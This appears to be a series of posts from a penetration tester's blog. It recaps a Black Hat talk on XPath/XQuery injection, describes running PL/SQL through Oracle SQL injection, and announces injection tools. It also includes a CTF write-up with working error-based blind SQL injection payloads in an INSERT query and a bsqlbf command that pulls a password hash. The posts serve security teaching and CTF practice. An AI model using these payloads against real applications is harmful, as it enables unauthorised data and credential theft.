Black Hat Eu 2012

Hello All,

as always it has been a while since I posted something. Some things never change…..

Anyways, I was privileged to speak at yet another Black Hat. This time i was a 2nd speaker and along with Tom Forbes we presented a talk on Hacking XPATH 2.0. One question which everyone wants to know, how many times have we found it in the wild? I have seen may be around 7-8 XPath injections in real life pentests and hence I agree this is not very common. XPath 2.0 was only introduced in 2010 and its still in stage of getting implemented in various technology.

Anyways, so if you happen to find a XPATH Injection, you can dump out the entire XML database from the back-end just as you would dump data in a blind sql injection. Further, if the back-end application supports XPath v2 then you can do lot more like extract data quickly over Out-of-bound channels such as DNS, HTTP etc. You can read not just the current XML document but any xml document on the system. You can do some internal network scanning etc. We then showed XQuery injection. Xquery is a superset of XPATH and supports more features like declaring variable, creating function etc. SO, if you have a XQuery injection, then you can insert what we called as “One Query To Get Them All”. This is basically one hiuge dumper script which recursively dump data to attacker’s HTTP or DNS server and with just one request you can dump any xml file on vulnerable server/app.

The paper and the slides can be found here:

Further, Tom wrote a tool to automate this which can be found here:

There were some very interesting talks. I liked Shreeraj’s talk on HTML5. One of the main points he made was that as browsers support html5, you need to worry about it even when your website does not run HTML5. I need to validate this statement, but my understanding is that he was saying with HTML5 you can pretty much issue cross domain XML HTTP request.

Of-course, I attended David Litchfield’s talk on Database goodies. He started by explaining the Lateral SQL Injection in oracle. He said that there are SYS owned objects within Oracle database and these can be exploited to do privilege escalation. Its worth noting that you need the CREATE PUBLIC SYNONYM privilege to exploit this and I am not sure how easily you can get this. He then talked about “giving 20/20 vision to a blind sql injection”. He showed a blind sql injection where app was not returning any data from back-end database and the app was passing the input to a vulnerable stored procedure. He then showed that you can declare a variable and store the output of arbitrary SQL into the variable and then print the variable with htp.print. Again, I am not 100% convinced whether *all* blind sqli can be tricked into doing this.

That’s it for now, hope to write another blog some time soon.

Hacking Oracle From Web: Part 2

It has been a long time since I posted something. In 2010, I released a paper which talked about how to execute OS code when exploiting a SQL Injection in a web app which talks to oracle database. Back then, I was not aware of 2 publicly available functions which could allow execution of PL/SQL statement. These functions change everything. These functions imply that we can issue multiple statements and overcome the limitations of oracle’s SQL language. Interestingly, these 2 functions exist from Oracle 9i upto 11g R2. While I am a little bit puzzled why I didn’t see these earlier, I have put together a few attack vectors in a new article/paper titled: Hacking Oracle From Web: Part 2

In a short summary, If you find a SQL Injection in a Oracle web app, you can issue multiple statements by calling one of the two publicly available functions. So, if the injection is in SELECT statement, you can run INSERT, DELETE etc. This also means that if the back-end database has any vulnerability, you can exploit it from the web and get higher privileges. Once you get higher privileges (typically become DBA) then you can execute OS code.

I have also made a small video which shows exploitation of a SQL Injection in an un-patched Oracle database.

Happy Hacking…

LDAP/XPATH Injection tools

At this year’s Blackhat US, we conducted a small workshop titled “The Art of Exploiting Leser Known Injection Flaws”. In the workshop we discussed a variety of techniques for exploiting ldap, xpath, xml entity injection.

We also released a couple of tools for automating the attacks against LDAP and XPATH. These can be downloaded here:

There is a small video showing this in action here

Hope, you have fun exploiting XPATH and LDAP Injections with these automated tools.

APPSECUSA CTF! Another Write Up

I recently came across the Appsec USA CTF. I must say it was a fantastic CTF and i wish there were more CTFs around application security topics. Well done Appsec team and organizers.

The official write up on how the winners solved the problem can be found here. If you are an appsec personnel then you may want to read the rest of the blog after giving CTF another go.

So, i wish i would have revisited the CTF later and have seen the hints! but anyways, I wanted to share an alternate solution to do the challenge. As it happens, the app has 2 sql injections, one in a select query and another one in Insert query. Obviously, the select query is pretty easy to exploit. Unfortunately, i wasnt clever enough to spot the injection in SELECT query and i worked out the hard way to exploit the insert SQL Injection and you actually don’t need the SELECT SQL injection and you can do everything within INSERT…:-)

here is the pseudo code:

INSERT INTO salerow(saleid,bookid,qty) VALUES(151576,1,injection\’)

clearly, the magic quote is enabled, but the injection is in integer, so doesn’t make much difference. You can use the True and Error scenario to exploit this:

INSERT INTO salerow(saleid,bookid,qty) VALUES(151576,1,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end))

INSERT INTO salerow(saleid,bookid,qty) VALUES(151576,1,(select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end))

Obviously you replace (1=1)/(1=2) with the boolean question you will ask the mysql server:

so a query like

INSERT INTO salerow(saleid,bookid,qty) VALUES(151576,1,(select case when (select substr(@@version,1,1))=5 then 1 else 1*(select table_name from information_schema.tables)end))

will not produce an error but a query like this:

INSERT INTO salerow(saleid,bookid,qty) VALUES(151576,1,(select case when (select substr(@@version,1,1))=6 then 1 else 1*(select table_name from information_schema.tables)end))

wil go to the else clause and will generate the following error:

Query failed: Subquery returns more than 1 row

So, now you have a standard true and false scenario and every time you see myql error, you have a false response and when you dont see an error you have a true response.

Using bsqlbf (with one slight modification) you can exploit this injection and obtain the password hash for sales user. The command line options i used were(together with burp running on port 8080):

bsqlbf-2.7pl -url “” -blind qty1 -nomatch “failed” -method POST -database 1 -type 2 -cookie “phpsessionid=xxxxxxxxxxxx” -proxy -sql “select password from users where id=2″

Hope it helps..:)

BSQLBF v 2.7

An updated version is now available for download. This supports “-nomatch” switch. The -nomatch switch is exactly opposite of the -match switch, ie, it will look for the supplied unique keyword which only appears in the false page and NOT in true page. Remember, the “-match” looks for a unique string which only appears in true and do not appear in false cases.

The -nomatch switch is particularly useful which carying out injections in the following scenarios:

Injection in insert statement
True and Error Scenario
Injection in order by etc

Download it here